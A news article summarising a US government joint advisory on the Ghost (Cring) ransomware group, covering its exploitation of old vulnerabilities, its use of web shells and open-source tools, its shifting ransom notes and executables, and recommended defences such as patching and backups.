The hackers are attacking from China, compromising organizations via outdated internet-facing services. Their motivation is money, but little is known about them otherwise.
The US authorities have shed some light on the mysterious Ghost ransomware ring, also known by many other names: Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture.
Most ransomware trackers don’t include the Ghost name – they seemingly don’t even have a victim site on the dark web. Yet the little-known hackers from China could’ve made a criminal fortune.
Their tactics are straight from the playbook: take a known flaw with publicly available exploit code, look for vulnerable services online, and profit. Even their tools are open source and widely available.
Exploiting vulnerabilities identified 3-14 years ago, Ghost hackers from China have compromised organizations in over 70 countries since early 202. Some of their entry points, such as Adobe ColdFusion flaws, were patched back in 2009 and 2010.
“Ghost actors, located in China, conduct these widespread attacks for financial gain,” the FBI, the CISA, and the Multi-State Information Sharing and Analysis Center (MS-ISAC) said in the joint advisory.
“Ghost actors exploit well-known vulnerabilities and target networks where available patches have not been applied.”
Ghost indiscriminately hacked schools, hospitals, critical infrastructure, religious institutions, manufacturing companies, numerous small and medium-sized businesses, and others whose internet-facing services ran outdated software and firmware versions.
Changing faces is their strategy. Ghost actors rotate their executables, switch file extensions for encrypted files, modify ransom note text, and use numerous ransom email addresses to hide their tracks, leading to variable attribution of this group over time.
Sticking to what works
While some companies don’t fix what ain’t broken, Ghost breaks what ain’t fixed. They look for vulnerable FortiOS appliances and servers running Adobe ColdFusion, Microsoft SharePoint, or Microsoft Exchange.
When they find an open door, they upload a malicious web shell that downloads and executes other tools, such as Cobalt Strike. Cobalt Strike is a commercially available adversary simulation tool often used to test organizations' security controls, but it is also widely exploited by threat actors.
Ghost isn’t focused on maintaining persistence – it typically spends only a day or two on the victim’s network before it’s done. The threat actor uses multiple open-source tools for privilege escalation, such as SharpZeroLogon, SharpGPPPass, BadPotato, and GodPotato.
“Ghost ransom notes often claim exfiltrated data will be sold if a ransom is not paid. However, Ghost actors do not frequently exfiltrate a significant amount of information or files, such as intellectual property or personally identifiable information (PII), that would cause significant harm to victims if leaked,” the advisory reads.
Various executables for encrypting shared similar functionality and were called Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe. The hackers used dozens of email addresses in their ransom notes but recently switched to the Tox protocol for communication with victims.
So, how do we protect ourselves against these ghosts? As always, following a minimum set of best cybersecurity practices is the first step.
“Patch known vulnerabilities by applying timely security updates to operating systems, software, and firmware within a risk-informed timeframe,” the authorities urge.
Other recommendations include maintaining system backups, segmenting networks, requiring phishing-resistant multi-factor authentication, and monitoring for unauthorized use of PowerShell.
The authorities do not encourage paying ransoms as this doesn’t guarantee file recovery and also emboldens hackers to target additional organizations.
Your email address will not be published. Required fields are markedmarked